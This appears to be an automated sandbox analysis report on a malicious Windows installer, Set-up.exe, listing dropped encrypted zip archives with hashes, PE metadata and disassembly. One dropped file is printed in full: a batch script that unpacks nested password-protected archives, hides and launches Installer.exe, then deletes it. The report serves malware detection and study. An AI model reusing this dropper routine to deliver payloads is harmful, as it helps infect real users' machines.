                                                          Preview:PK........Rn.Yr...+...+.......file_1.zipPK........Kn.Y..5....8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.*........5J...l.o..H.....|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...^s.(.=.&.&.F...KR..=.K.+...,u.:..@.v,....=6i.%v\...e;W.]....>z....M.mR.Y...l...t...5.U......sm. 1Vy<.W.n.j.[.[.........8..WY`.H.2.....<.!..U.6o..i.U.YJC..........9.. ~...pK....O.u._.J.4)...S<..Ai.-.......J&;.Q.9...J].u....Q...a..$..".?.4#.....w.....d...TI...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ..*.,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q...u.....0:.......'...1...=A)...s6S.y.q<.[..N!.c.J.....f$.......@3..%Ic."f..X.u..<n9.v..=....a.`.n.e......u......d...
                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                          File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                          Category:dropped
                                                          Size (bytes):511839
                                                          Entropy (8bit):7.998154920833029
                                                          Encrypted:true
                                                          SSDEEP:12288:E3Fvr/KrgOD4W/iTJxnZxZt84otoKPF7rcFC7Lj:SFmr9DV6TJpZxXEL9rNXj
                                                          MD5:8854D4E74C1AE01EAA463330A17CF2BD
                                                          SHA1:9BFAB26E3B7CC05E4D94DE9930FD1428395458F3
                                                          SHA-256:DF9ADC70A263FCEBE4F6EF88404AC0ACF424F2596F3F191A2FFB752B9D4BB064
                                                          SHA-512:8C45E9A2F2187FA94DA24835B8F318741F682962211BFDEC5E5BA912112B5717DB4E4AED6E128C985FBEA016980F071D4961549F680B9FE0AB97884FA6559A0A
                                                          Malicious:true
                                                          Preview:PK........Rn.Y$..[............file_2.zipPK........Rn.Yr...+...+.......file_1.zipPK........Kn.Y..5....8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.*........5J...l.o..H.....|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...^s.(.=.&.&.F...KR..=.K.+...,u.:..@.v,....=6i.%v\...e;W.]....>z....M.mR.Y...l...t...5.U......sm. 1Vy<.W.n.j.[.[.........8..WY`.H.2.....<.!..U.6o..i.U.YJC..........9.. ~...pK....O.u._.J.4)...S<..Ai.-.......J&;.Q.9...J].u....Q...a..$..".?.4#.....w.....d...TI...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ..*.,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q...u.....0:.......'...1...=A)...s6S.y.q<.[..N!.c.J.....f$.......@3..%Ic."f..X
                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                          File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                          Category:dropped
                                                          Size (bytes):511993
                                                          Entropy (8bit):7.998157069875339
                                                          Encrypted:true
                                                          SSDEEP:12288:V3Fvr/KrgOD4W/iTJxnZxZt84otoKPF7rcFC7Lk:pFmr9DV6TJpZxXEL9rNXk
                                                          MD5:FEA1BC14AFA3E37F1E15EB337E72B12C
                                                          SHA1:148F4DEBB7F4E31EE7C1C04A11C45B0083043156
                                                          SHA-256:6C1795FC843B77D29BD5F103DFC100C8928B7551F01FD8135F21C078B8533A7F
                                                          SHA-512:07BCF6FC543D31B6902CA156C3F84A34FE421A8056DDC6533CD32D67B1C3D10A554556C2C28EA656EC4540EDD3B82FE4C5F677115F7C1BBFE4BE7E0CC57CA1A3
                                                          Malicious:true
                                                          Preview:PK........Rn.Y..uB_..._.......file_3.zipPK........Rn.Y$..[............file_2.zipPK........Rn.Yr...+...+.......file_1.zipPK........Kn.Y..5....8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.*........5J...l.o..H.....|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...^s.(.=.&.&.F...KR..=.K.+...,u.:..@.v,....=6i.%v\...e;W.]....>z....M.mR.Y...l...t...5.U......sm. 1Vy<.W.n.j.[.[.........8..WY`.H.2.....<.!..U.6o..i.U.YJC..........9.. ~...pK....O.u._.J.4)...S<..Ai.-.......J&;.Q.9...J].u....Q...a..$..".?.4#.....w.....d...TI...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ..*.,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q...u.....0:.......'...1...=A)...s6S.y
                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                          File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                          Category:dropped
                                                          Size (bytes):512147
                                                          Entropy (8bit):7.998155444192939
                                                          Encrypted:true
                                                          SSDEEP:12288:w3Fvr/KrgOD4W/iTJxnZxZt84otoKPF7rcFC7L4:GFmr9DV6TJpZxXEL9rNX4
                                                          MD5:FC6106C411428E421DE593673892B72F
                                                          SHA1:B5C1F38E1198E26FA2C2B786000E797676794045
                                                          SHA-256:C165A3D777629605669D5C7AC7D55240A8DF0CB59686DD91D8A6111C03C67EBE
                                                          SHA-512:BF46CA3B6E8DFED16CD701E05E194EB77B7E94FDE74DB260C7E9F679768DD7A1D516A20DE5ECE5E04B850D9582127A883F174C22CD2F47786EB53258EE4DD4A4
                                                          Malicious:true
                                                          Preview:PK........Rn.Y...............file_4.zipPK........Rn.Y..uB_..._.......file_3.zipPK........Rn.Y$..[............file_2.zipPK........Rn.Yr...+...+.......file_1.zipPK........Kn.Y..5....8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.*........5J...l.o..H.....|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...^s.(.=.&.&.F...KR..=.K.+...,u.:..@.v,....=6i.%v\...e;W.]....>z....M.mR.Y...l...t...5.U......sm. 1Vy<.W.n.j.[.[.........8..WY`.H.2.....<.!..U.6o..i.U.YJC..........9.. ~...pK....O.u._.J.4)...S<..Ai.-.......J&;.Q.9...J].u....Q...a..$..".?.4#.....w.....d...TI...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ..*.,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q
                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                          Category:dropped
                                                          Size (bytes):512233
                                                          Entropy (8bit):7.99811336541424
                                                          Encrypted:true
                                                          SSDEEP:12288:33Fvrpo5g6ZWKHEDJnv73rP8woTiizbxr+FCrNK:HFy5fZdkDJv73bChNrTRK
                                                          MD5:DFCB1DBB6A046FD464412CCD1DAE66FE
                                                          SHA1:512DBB73C6BDC9DB181C48BC3BADDFCB36BD018F
                                                          SHA-256:0CC1DD7548213C1868612CDB992F566AA701D77A9AE018C709C450561DD22AD9
                                                          SHA-512:AF57425587F0590E80386BC947A06330F785B1130A4CC34AAA48008EB74D17F5618D59FBBD796CFCB2F2B207CC07413E0878FFFB625239ABE2869B653F9F9780
                                                          Malicious:true
                                                          Preview:PK........Rn.Y.?+.O...........file_5.zipd.UP....`$............P..vqw'...n...........tg........."......K..[.....e.....w...........]J......_....:%T.p...........:.../....q..a....!./....3...#...._UYG7w.{{.WV..X...7.....X..s6A.G..a....E........6..0K..i#.R[A..Lj..QZ........-,..J..X...6.v:P.#..-.>...S........}gy8...5..:.:J!...o#7g8..$..2m.\"..M-... .iM...f..r.|...R..!yk....y.p.....q`.`....U......9..}.....v\c.x.....M.}..D>...T.+I.8.Z.......m...-2...USb.... .C.[3..}......@.T..[....4[o8.m..-..m..F.-.C.D;&.+.Y^-.. ........G......'s...v. .....O.A...M....A..O....b...V.n....2.;..'...+,...C09...@.v.c..|...>.\..[Wd.~...@m].9.w.......G..g.l^.v..X.X]9.............2..xg.....@..#..Cn...-u...\Q.'......UL9Z.Y..!_.9.....H.x..C........2L......z..;.g..||tICv-..M.;..01z..+.&........xX=~..Z.b...,^.B.%...M....5T.AA8....-..,.... .2Tp..H..A.Og..G.a....#.-3.q.q......n_'...R3.....w...C.r..I..iP.I.......V}.> .*...r...Q..:....n.....N,.;..h..n.w..U.........c>.Bo*.
                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                          File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                          Category:dropped
                                                          Size (bytes):512387
                                                          Entropy (8bit):7.998123873104573
                                                          Encrypted:true
                                                          SSDEEP:12288:H3Fvrpo5g6ZWKHEDJnv73rP8woTiizbxr+FCrNV:XFy5fZdkDJv73bChNrTRV
                                                          MD5:B7C74415382E8A9078A3A9467BD12517
                                                          SHA1:69E51182E425ED6A13D0D021B0BAD8301A1792F5
                                                          SHA-256:4BF6B02FE0358DC56339BBC0A26ABE7BE1ABED63B74EB975EC76C356952BDE5B
                                                          SHA-512:3E3EDB65B5A2BB69B769922D71259ACA795DE6C84C64458FE4DEB4236BCAB6B7A9919955B72E34D720B4D84445CEF23B081FBE5A7688B6CDD25DE5200D96F361
                                                          Malicious:true
                                                          Preview:PK........Rn.Y.p.............file_6.zipPK........Rn.Y.?+.O...........file_5.zipd.UP....`$............P..vqw'...n...........tg........."......K..[.....e.....w...........]J......_....:%T.p...........:.../....q..a....!./....3...#...._UYG7w.{{.WV..X...7.....X..s6A.G..a....E........6..0K..i#.R[A..Lj..QZ........-,..J..X...6.v:P.#..-.>...S........}gy8...5..:.:J!...o#7g8..$..2m.\"..M-... .iM...f..r.|...R..!yk....y.p.....q`.`....U......9..}.....v\c.x.....M.}..D>...T.+I.8.Z.......m...-2...USb.... .C.[3..}......@.T..[....4[o8.m..-..m..F.-.C.D;&.+.Y^-.. ........G......'s...v. .....O.A...M....A..O....b...V.n....2.;..'...+,...C09...@.v.c..|...>.\..[Wd.~...@m].9.w.......G..g.l^.v..X.X]9.............2..xg.....@..#..Cn...-u...\Q.'......UL9Z.Y..!_.9.....H.x..C........2L......z..;.g..||tICv-..M.;..01z..+.&........xX=~..Z.b...,^.B.%...M....5T.AA8....-..,.... .2Tp..H..A.Og..G.a....#.-3.q.q......n_'...R3.....w...C.r..I..iP.I.......V}.> .*...r...Q..:....
                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                          File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                          Category:dropped
                                                          Size (bytes):512541
                                                          Entropy (8bit):7.998130338127172
                                                          Encrypted:true
                                                          SSDEEP:12288:g3Fvrpo5g6ZWKHEDJnv73rP8woTiizbxr+FCrNM:2Fy5fZdkDJv73bChNrTRM
                                                          MD5:C9C7BB282A5727DA7E9E1F4E9D8D3FBA
                                                          SHA1:79B0AA3EEB4E3A998B357DAC97473948F68EF773
                                                          SHA-256:BE879EFDEC472650B101D7BAFE4A1903A7CDDDB8A623A154921C230014D1A19E
                                                          SHA-512:E96D16A720B7EE79FE0E059E00A26D833A7B2DB7F58B5220B5E0131A4A5DED923AD59B9BF500E46BAEFCCB8EE0F354CAF9F737CF0371F6AA47C92F3EABB63AA7
                                                          Malicious:true
                                                          Preview:PK........Rn.Y...............file_7.zipPK........Rn.Y.p.............file_6.zipPK........Rn.Y.?+.O...........file_5.zipd.UP....`$............P..vqw'...n...........tg........."......K..[.....e.....w...........]J......_....:%T.p...........:.../....q..a....!./....3...#...._UYG7w.{{.WV..X...7.....X..s6A.G..a....E........6..0K..i#.R[A..Lj..QZ........-,..J..X...6.v:P.#..-.>...S........}gy8...5..:.:J!...o#7g8..$..2m.\"..M-... .iM...f..r.|...R..!yk....y.p.....q`.`....U......9..}.....v\c.x.....M.}..D>...T.+I.8.Z.......m...-2...USb.... .C.[3..}......@.T..[....4[o8.m..-..m..F.-.C.D;&.+.Y^-.. ........G......'s...v. .....O.A...M....A..O....b...V.n....2.;..'...+,...C09...@.v.c..|...>.\..[Wd.~...@m].9.w.......G..g.l^.v..X.X]9.............2..xg.....@..#..Cn...-u...\Q.'......UL9Z.Y..!_.9.....H.x..C........2L......z..;.g..||tICv-..M.;..01z..+.&........xX=~..Z.b...,^.B.%...M....5T.AA8....-..,.... .2Tp..H..A.Og..G.a....#.-3.q.q......n_'...R3.....w...C.r
                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                          File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                          Category:dropped
                                                          Size (bytes):512695
                                                          Entropy (8bit):7.998132491458882
                                                          Encrypted:true
                                                          SSDEEP:12288:U3Fvrpo5g6ZWKHEDJnv73rP8woTiizbxr+FCrNw:iFy5fZdkDJv73bChNrTRw
                                                          MD5:3B90F281C49BDF17DA4ADF690E2A475D
                                                          SHA1:86821013A23E5048882BF58711D0549695ACA67D
                                                          SHA-256:864947AD239B5E7B903C862FADF82E296EE048D73B70F4FCA516770271F2A741
                                                          SHA-512:6F92DB4B36DF182BFB576863A1DF1A8C3AF4929135226ABE5B6B3C59FE6F43E39E4563CCDD22F35D28277B8C826590079A1DEB68BE39F7609E7FDEFAA4209B9E
                                                          Malicious:true
                                                          Preview:PK........Rn.Ye.*............file_8.zipPK........Rn.Y...............file_7.zipPK........Rn.Y.p.............file_6.zipPK........Rn.Y.?+.O...........file_5.zipd.UP....`$............P..vqw'...n...........tg........."......K..[.....e.....w...........]J......_....:%T.p...........:.../....q..a....!./....3...#...._UYG7w.{{.WV..X...7.....X..s6A.G..a....E........6..0K..i#.R[A..Lj..QZ........-,..J..X...6.v:P.#..-.>...S........}gy8...5..:.:J!...o#7g8..$..2m.\"..M-... .iM...f..r.|...R..!yk....y.p.....q`.`....U......9..}.....v\c.x.....M.}..D>...T.+I.8.Z.......m...-2...USb.... .C.[3..}......@.T..[....4[o8.m..-..m..F.-.C.D;&.+.Y^-.. ........G......'s...v. .....O.A...M....A..O....b...V.n....2.;..'...+,...C09...@.v.c..|...>.\..[Wd.~...@m].9.w.......G..g.l^.v..X.X]9.............2..xg.....@..#..Cn...-u...\Q.'......UL9Z.Y..!_.9.....H.x..C........2L......z..;.g..||tICv-..M.;..01z..+.&........xX=~..Z.b...,^.B.%...M....5T.AA8....-..,.... .2Tp..H..A.Og..G.a.
                                                          Process:C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exe
                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                          Category:dropped
                                                          Size (bytes):2180698
                                                          Entropy (8bit):7.99990891733921
                                                          Encrypted:true
                                                          SSDEEP:49152:5RcsCieJLOveuKY6V5Rqgoq1cZvGcn2MyelH+5VTwQx6HtqVNP6ph:Pcs2JOmvR0qTClH+5VMNh
                                                          MD5:AE5771940899F79E634B6E4475040467
                                                          SHA1:225434A4900232053FBEFF5A60A08E53CFC1436A
                                                          SHA-256:B9740CF94F4A77BB2D61EC79FF342E7C739BB35B2B61F32E9B5F2D09218C24FC
                                                          SHA-512:2B50DA042539E81EA4B1B5DBDE62F3AEE6473DF550401DF2BC08505FC77A178994AB6608960251873B48089AE171E6365AE52408A493E71389B98D4796898134
                                                          Malicious:true
                                                          Preview:PK........Rn.Yh.2..E!..E!.....file_11.zip.aO.Y.......9m.X..v..&....j^..U.........9>..&....;.M.B.....>Ez...(..v..........X.<..._..f.o?..l...?../s .-...u.m.i.!%.E.@w...do/.W/..=.#.....Lde...QQN....Cu..w..P.d....Y..2z.I.f$DUo}WA.....h[....H4....b..`...k.#....fo..g..UA.....j..;......N.?...[..+.|.Ob....W...iS3...6.......fJ.......[.u!.BW.OH..:9..*/_....O.!]...@....{V.....}.T.I.C"...X+_V*.s.|V..o....$;Cr...V....?.5b..g..x.C.a...k1..n..,2..6....}....Q....gq3U.X......].w..T.buX..!.?..Q......_`.....K..B.........b......U...bqA..F+....cf5....,.I.m......qu...#..%.k.....AH.K..:..zq.~.....h...L6.8L;...6..l....Vr.3.,....w(.mj..b...Kf...u...M..V..IV.-.....G+......h[I.Vs...U.5...c':..u..3S...'@.[...;.L...4f.].D.A..TB....P.'.l.X....o...n......l.+..8b.dN.Y...`.@.r.j.i)...K+:.Tr.:<W...L.@.}.......Y.A/.bf.N......-L...X....R.:.n.cq.........&..h|.5.m..z.........y.d..>...Q#..p.7..6.C....Q.l...R..O.'!.,...'...|Y~.`*$.D..kSD...kdl%x...T2Uo..<.......q}"......}Rzw..Y..u
                                                          Process:C:\Windows\System32\cmd.exe
                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                          Category:dropped
                                                          Size (bytes):2180698
                                                          Entropy (8bit):7.99990891733921
                                                          Encrypted:true
                                                          SSDEEP:49152:5RcsCieJLOveuKY6V5Rqgoq1cZvGcn2MyelH+5VTwQx6HtqVNP6ph:Pcs2JOmvR0qTClH+5VMNh
                                                          MD5:AE5771940899F79E634B6E4475040467
                                                          SHA1:225434A4900232053FBEFF5A60A08E53CFC1436A
                                                          SHA-256:B9740CF94F4A77BB2D61EC79FF342E7C739BB35B2B61F32E9B5F2D09218C24FC
                                                          SHA-512:2B50DA042539E81EA4B1B5DBDE62F3AEE6473DF550401DF2BC08505FC77A178994AB6608960251873B48089AE171E6365AE52408A493E71389B98D4796898134
                                                          Malicious:true
                                                          Preview:PK........Rn.Yh.2..E!..E!.....file_11.zip.aO.Y.......9m.X..v..&....j^..U.........9>..&....;.M.B.....>Ez...(..v..........X.<..._..f.o?..l...?../s .-...u.m.i.!%.E.@w...do/.W/..=.#.....Lde...QQN....Cu..w..P.d....Y..2z.I.f$DUo}WA.....h[....H4....b..`...k.#....fo..g..UA.....j..;......N.?...[..+.|.Ob....W...iS3...6.......fJ.......[.u!.BW.OH..:9..*/_....O.!]...@....{V.....}.T.I.C"...X+_V*.s.|V..o....$;Cr...V....?.5b..g..x.C.a...k1..n..,2..6....}....Q....gq3U.X......].w..T.buX..!.?..Q......_`.....K..B.........b......U...bqA..F+....cf5....,.I.m......qu...#..%.k.....AH.K..:..zq.~.....h...L6.8L;...6..l....Vr.3.,....w(.mj..b...Kf...u...M..V..IV.-.....G+......h[I.Vs...U.5...c':..u..3S...'@.[...;.L...4f.].D.A..TB....P.'.l.X....o...n......l.+..8b.dN.Y...`.@.r.j.i)...K+:.Tr.:<W...L.@.}.......Y.A/.bf.N......-L...X....R.:.n.cq.........&..h|.5.m..z.........y.d..>...Q#..p.7..6.C....Q.l...R..O.'!.,...'...|Y~.`*$.D..kSD...kdl%x...T2Uo..<.......q}"......}Rzw..Y..u
                                                          Process:C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):476
                                                          Entropy (8bit):5.09690163183538
                                                          Encrypted:false
                                                          SSDEEP:12:QUp+CF16g64CTFMj2LIQLvvk7WYCVGrMLvmuCCgXjgrXgX78agXrrEOXUigXY:QUpNF16g632Ckevk7WYCVGYTtS0rXS7Y
                                                          MD5:A6D611790D8AFE6E81448CDF6DDB9EA4
                                                          SHA1:4E402E68FC7130433A7004CBCE3834A8743BCF4C
                                                          SHA-256:0C7BE4C51CD64A8B6D2235EE0EEAB8C98C565ED9B74B50C0EBA02750C3B24B2F
                                                          SHA-512:2FAA6DE4F3E2872FE2575F775C282E17FAFB5AD4C31EB1DE118081F80F28B33E0C1ACFEC0779B5911314BA50A5A5C1EC11491A393C272F3EAB943636A6BF4938
                                                          Malicious:false
                                                          Preview:..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p29586644319935208542739921766 -oextracted ..for /l %%i in (11,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "Installer.exe" ../..cd....rd /s /q extracted..attrib +H "Installer.exe"..start "" "Installer.exe"..cls..echo Launched 'Installer.exe'...pause..del /f /q "Installer.exe"..
                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:dropped
                                                          Size (bytes):345
                                                          Entropy (8bit):5.046538254653124
                                                          Encrypted:false
                                                          SSDEEP:6:AMMyS3pt+uoQcAxXF2SaioB4Dc8NmVSTgqF1AivwtHgN6qFfpap1tNGpKoip:pMpDh5RwXlCfTgqFyYw7qJA1tNGkoC
                                                          MD5:5155BABB04DC876A4871112BA3AC2716
                                                          SHA1:F7A7E8D917F4B829610ED476A51BE9096CF66918
                                                          SHA-256:DA8B2175AEE6D2B8300AF87F89FBD77114349B41852CFCA04446CE7BCA990CB2
                                                          SHA-512:C1A54C1BFC5E493B18C138D964112EC95ACEA7BD9F20F2971F666F6B152DA723A4B999118381FEC8D42F31B6D5F4A0ABA9F684800E0ECA4079A1BD2391D6CD59
                                                          Malicious:false
                                                          Preview:..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 511531 bytes (500 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 511531.... 0%. .Everything is Ok....Size: 625464..Compressed: 511531..
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):4.249662010923958
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:Set-up.exe
                                                          File size:56'623'098 bytes
                                                          MD5:8ea72d1dd14d5a570d5f5a595cfd1d5d
                                                          SHA1:95b3578c21adee532b48059d2e6d464676ac4768
                                                          SHA256:642b22477ed760060155d8e6fc892590774ea57844694d22e47d23bb0473f10f
                                                          SHA512:5e09c007538a8b3aedf02f485ef58a3d8248a46b0cd4c7800cd426aad9b242586765945be4a187ef2181dfc23b20c40256f773c4abc2754840d6230b2f7fec9b
                                                          SSDEEP:24576:ls7kmRZjC4EHIiF2ZZ08LEYHQyWXI8LHxvjOXlf:pvFW08LxQLXFzw
                                                          TLSH:F3C712DA4BDE334868173CD23DE10C7C63A456B32BF166182A8FB05656B6510D2F8FB9
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....
                                                          Icon Hash:3efac0bce6cce0c0
                                                          Entrypoint:0x403883
                                                          Entrypoint Section:.text
                                                          Digitally signed:true
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:0
                                                          File Version Major:5
                                                          File Version Minor:0
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:0
                                                          Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                          Signature Valid:
                                                          Signature Issuer:
                                                          Signature Validation Error:
                                                          Error Number:
                                                          Not Before, Not After
                                                            Subject Chain
                                                              Version:
                                                              Thumbprint MD5:
                                                              Thumbprint SHA-1:
                                                              Thumbprint SHA-256:
                                                              Serial:
                                                              Instruction
                                                              sub esp, 000002D4h
                                                              push ebx
                                                              push ebp
                                                              push esi
                                                              push edi
                                                              push 00000020h
                                                              xor ebp, ebp
                                                              pop esi
                                                              mov dword ptr [esp+18h], ebp
                                                              mov dword ptr [esp+10h], 00409268h
                                                              mov dword ptr [esp+14h], ebp
                                                              call dword ptr [00408030h]
                                                              push 00008001h
                                                              call dword ptr [004080B4h]
                                                              push ebp
                                                              call dword ptr [004082C0h]
                                                              push 00000008h
                                                              mov dword ptr [00472EB8h], eax
                                                              call 00007F6AC50A9F6Bh
                                                              push ebp
                                                              push 000002B4h
                                                              mov dword ptr [00472DD0h], eax
                                                              lea eax, dword ptr [esp+38h]
                                                              push eax
                                                              push ebp
                                                              push 00409264h
                                                              call dword ptr [00408184h]
                                                              push 0040924Ch
                                                              push 0046ADC0h
                                                              call 00007F6AC50A9C4Dh
                                                              call dword ptr [004080B0h]
                                                              push eax
                                                              mov edi, 004C30A0h
                                                              push edi
                                                              call 00007F6AC50A9C3Bh
                                                              push ebp
                                                              call dword ptr [00408134h]
                                                              cmp word ptr [004C30A0h], 0022h
                                                              mov dword ptr [00472DD8h], eax
                                                              mov eax, edi
                                                              jne 00007F6AC50A753Ah
                                                              push 00000022h
                                                              pop esi
                                                              mov eax, 004C30A2h
                                                              push esi
                                                              push eax
                                                              call 00007F6AC50A9911h
                                                              push eax
                                                              call dword ptr [00408260h]
                                                              mov esi, eax
                                                              mov dword ptr [esp+1Ch], esi
                                                              jmp 00007F6AC50A75C3h
                                                              push 00000020h
                                                              pop ebx
                                                              cmp ax, bx
                                                              jne 00007F6AC50A753Ah
                                                              add esi, 02h
                                                              cmp word ptr [esi], bx
                                                              Programming Language:
                                                              • [ C ] VS2008 SP1 build 30729
                                                              • [IMP] VS2008 SP1 build 30729
                                                              • [ C ] VS2010 SP1 build 40219
                                                              • [RES] VS2010 SP1 build 40219
                                                              • [LNK] VS2010 SP1 build 40219
                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x2f3e.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0xeea560x28b0.ndata
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc0xf40000x2f3e0x300073db03331e73fd1948b7b6a5d8b17341False0.5513509114583334data5.469163614302966IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0xf70000xf320x10000aadf3b52cfb5bd4e0a965152914b748False0.58935546875data5.415127623636039IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_ICON0xf41d80x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.5696704637917006
                                                              RT_DIALOG0xf68400x100dataEnglishUnited States0.5234375
                                                              RT_DIALOG0xf69400x11cdataEnglishUnited States0.6056338028169014
                                                              RT_DIALOG0xf6a5c0x60dataEnglishUnited States0.7291666666666666
